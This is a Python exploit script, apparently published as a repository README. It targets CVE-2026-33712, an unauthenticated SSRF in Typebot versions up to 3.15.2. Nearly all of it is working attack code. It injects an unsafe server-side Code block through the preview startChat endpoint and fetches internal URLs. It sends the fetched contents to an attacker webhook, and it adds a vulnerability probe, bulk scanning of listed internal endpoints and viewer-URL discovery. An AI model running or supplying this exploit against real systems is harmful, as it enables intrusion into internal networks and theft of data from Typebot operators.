README.md
Rendering markdown...
#!/usr/bin/env python3
"""
CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit
Typebot <= 3.15.2 - Unauthenticated SSRF via isolated-vm sandbox fetch
that bypasses validateHttpReqUrl() SSRF protection.
The fetch() inside the isolated-vm sandbox returns response.text() directly,
so the result is a string, not a Response object. Do NOT call .text() on it.
"""
import requests
import json
import sys
import urllib.parse
import argparse
import time
import random
import string
import os
import re
ENDPOINTS_FILE = os.path.join(os.path.dirname(os.path.abspath(__file__)), "endpoints.txt")
def rand_id(length=6):
return "".join(random.choices(string.ascii_lowercase + string.digits, k=length))
def js_escape(s):
return s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n")
def build_payload(code):
rid = rand_id()
return {
"typebotId": f"sr-{rid}",
"typebot": {
"version": "6",
"id": f"bt-{rid}",
"workspaceId": "test",
"updatedAt": "2026-01-01T00:00:00.000Z",
"groups": [
{
"id": f"g1-{rid}", "title": "Start",
"graphCoordinates": {"x": 0, "y": 0},
"blocks": [
{"id": f"b1-{rid}", "type": "start", "label": "Start",
"outgoingEdgeId": f"e1-{rid}"}
],
},
{
"id": f"g2-{rid}", "title": "Run",
"graphCoordinates": {"x": 200, "y": 0},
"blocks": [
{
"id": f"b2-{rid}", "type": "Code",
"outgoingEdgeId": f"e2-{rid}",
"options": {
"name": "SSRF",
"content": code,
"isExecutedOnClient": False,
"isUnsafe": True,
},
}
],
},
],
"edges": [
{"id": f"e1-{rid}", "from": {"blockId": f"b1-{rid}"},
"to": {"groupId": f"g2-{rid}"}}
],
"events": [
{"id": f"ev1-{rid}", "type": "start", "outgoingEdgeId": f"e1-{rid}",
"graphCoordinates": {"x": 0, "y": 0}}
],
"variables": [{"id": f"v1-{rid}", "name": "r"}],
"settings": {"general": {}},
"theme": {"general": {}, "chat": {}},
},
}
def send_ssrf(base_url, code, timeout=20):
payload = build_payload(code)
endpoint = f"{base_url.rstrip('/')}/api/v1/typebots/{payload['typebotId']}/preview/startChat"
headers = {"Content-Type": "application/json", "Accept": "application/json"}
try:
r = requests.post(endpoint, json=payload, headers=headers, timeout=timeout)
return r.json()
except requests.exceptions.RequestException as e:
return {"error": str(e)}
def preflight_check(base_url, webhook=None, timeout=15):
"""Probe the target to determine if it's vulnerable, patched, or unreachable.
Returns one of: 'vulnerable', 'patched', 'endpoint_missing', 'error'."""
wh_callback = ""
if webhook:
wh_callback = f"""
await fetch("{webhook}", {{
method: "POST",
headers: {{"Content-Type": "text/plain"}},
body: "preflight-ok: " + (typeof r === "string" ? r.substring(0,100) : (await r.text()).substring(0,100))
}});
"""
code = f"""
try {{
var r = await fetch("http://127.0.0.1:3000/");{wh_callback}
}} catch(e) {{}}
var x = 1;
"""
resp = send_ssrf(base_url, code, timeout)
if "sessionId" in resp:
return "vulnerable"
msg = resp.get("message", "") or json.dumps(resp)
if "UNAUTHORIZED" in msg or "You must be logged in" in msg:
return "patched"
if "NOT_FOUND" in msg or "Not found" in msg:
return "endpoint_missing"
if "error" in resp:
return f"error: {resp['error'][:80]}"
return f"unexpected: {json.dumps(resp)[:100]}"
def exfiltrate(base_url, internal_url, webhook, label="", timeout=20):
"""Fetch an internal URL and exfiltrate its content via POST body to webhook."""
safe = js_escape(internal_url)
l_escaped = urllib.parse.quote(label or internal_url, safe="")
code = f"""
try {{
var r = await fetch("{safe}");
var b = typeof r === "string" ? r : await r.text();
await fetch("{webhook}", {{
method: "POST",
headers: {{"Content-Type": "text/plain"}},
body: "{l_escaped}: " + b
}});
}} catch(e) {{
await fetch("{webhook}?err_{l_escaped}=" + encodeURIComponent(e.toString().substring(0,200)));
}}
"""
return send_ssrf(base_url, code, timeout)
def ensure_scheme(url):
if url and not url.startswith("http://") and not url.startswith("https://"):
return f"http://{url}"
return url
def detect_viewer_url(target, timeout=15):
"""Probe /__ENV.js on target to find NEXT_PUBLIC_VIEWER_URL."""
url = ensure_scheme(target).rstrip("/") + "/__ENV.js"
try:
r = requests.get(url, timeout=timeout)
if r.status_code == 200:
m = re.search(r'NEXT_PUBLIC_VIEWER_URL["\']?:\s*["\']([^"\']+)["\']', r.text)
if m:
viewer = m.group(1)
print(f"[+] Detected viewer URL from __ENV.js: {viewer}")
return viewer
except requests.exceptions.RequestException:
pass
return None
def load_endpoints():
"""Load endpoint URLs from endpoints.txt (one URL per line, ignores blanks)."""
if not os.path.exists(ENDPOINTS_FILE):
print(f"[-] Endpoints file not found: {ENDPOINTS_FILE}", file=sys.stderr)
return []
targets = []
with open(ENDPOINTS_FILE) as f:
for line in f:
line = line.strip()
if not line:
continue
targets.append((ensure_scheme(line), line))
return targets
def scan_targets(base_url, targets, webhook, delay=0.3):
"""Scan multiple internal URLs and exfiltrate results."""
for i, (url, desc) in enumerate(targets):
label = f"[{i+1}/{len(targets)}] {desc}"
print(f" {label:50s} {url}", end=" ", flush=True)
resp = exfiltrate(base_url, url, webhook, label)
if "sessionId" in resp:
print("OK")
elif "error" in resp:
print(f"FAIL: {resp['error'][:60]}")
else:
s = json.dumps(resp)
print(f"UNEXPECTED: {s[:80]}")
time.sleep(delay)
def main():
parser = argparse.ArgumentParser(
description="CVE-2026-33712 - Typebot Unauthenticated SSRF Exploit",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Single URL
%(prog)s -t https://bot.example.com -u http://127.0.0.1:3000/__ENV.js -w https://webhook.site/your-uuid
# Scan all endpoints from endpoints.txt
%(prog)s -t https://bot.example.com -w https://webhook.site/your-uuid --scan
# Auto-detect viewer URL from builder's __ENV.js
%(prog)s -t https://builder.example.com -w https://webhook.site/your-uuid --detect-viewer --scan
# Single test with output to endpoint
%(prog)s -t https://bot.example.com -u http://typebot-builder:3000/ -w https://webhook.site/your-uuid
""",
)
parser.add_argument("-t", "--target", required=True, help="Vulnerable Typebot instance URL (e.g. https://bot.example.com)")
parser.add_argument("-u", "--url", help="Internal URL to fetch via SSRF")
parser.add_argument("-w", "--webhook", default=os.environ.get("WEBHOOK_URL"),
help="Webhook URL for data exfiltration (or set WEBHOOK_URL env var)")
parser.add_argument("--scan", action="store_true",
help="Scan all URLs from endpoints.txt")
parser.add_argument("--detect-viewer", action="store_true",
help="Auto-detect viewer URL from builder's __ENV.js and use it as target")
parser.add_argument("--force", action="store_true",
help="Skip pre-flight checks and force execution")
parser.add_argument("--timeout", type=int, default=20, help="Request timeout in seconds (default: 20)")
parser.add_argument("--delay", type=float, default=0.3, help="Delay between scan requests (default: 0.3)")
args = parser.parse_args()
args.target = ensure_scheme(args.target)
# Auto-detect viewer URL from builder
if args.detect_viewer:
print(f"[*] Probing: {args.target}")
viewer = detect_viewer_url(args.target, args.timeout)
if viewer:
args.target = ensure_scheme(viewer)
else:
print("[-] Could not detect viewer URL, using target as-is")
print(f"[*] Target: {args.target}")
if not args.webhook:
print("[-] Error: --webhook / -w is required (or set WEBHOOK_URL env var)")
print(" Get one at https://webhook.site")
sys.exit(1)
print(f" Webhook: {args.webhook}")
print()
# Pre-flight check
print("[*] Pre-flight: probing target...", end=" ", flush=True)
status = preflight_check(args.target, args.webhook, args.timeout)
print(status)
if status == "patched":
print("[-] Target is patched (auth required). SSRF not exploitable.")
if not args.force:
sys.exit(1)
elif status == "endpoint_missing":
print("[-] Endpoint not found. Target may be the builder (not viewer), wrong version, or wrong URL.")
print(" Try --detect-viewer if this might be the builder.")
if not args.force:
sys.exit(1)
elif status == "vulnerable":
print("[+] Target appears VULNERABLE! Proceeding...")
elif status.startswith("error"):
print(f"[-] {status}")
if not args.force:
sys.exit(1)
else:
print(f"[-] {status}")
if not args.force:
sys.exit(1)
print()
# Scan mode
if args.scan:
targets = load_endpoints()
if not targets:
print("[-] No endpoints found. Make sure endpoints.txt exists with valid URLs.")
sys.exit(1)
print(f"[*] Scanning {len(targets)} endpoints from endpoints.txt...\n")
scan_targets(args.target, targets, args.webhook, args.delay)
print(f"\n[*] Done. Check your webhook ({args.webhook}) for results.")
return
# Single URL mode
if not args.url:
print("[-] Error: --url / -u is required, or use --scan to read from endpoints.txt")
sys.exit(1)
args.url = ensure_scheme(args.url)
print(f"[*] Fetching: {args.url}")
resp = exfiltrate(args.target, args.url, args.webhook)
if "sessionId" in resp:
print("[+] Request sent. Check webhook for response body.")
else:
print(f"[-] Failed: {json.dumps(resp)[:200]}")
if __name__ == "__main__":
main()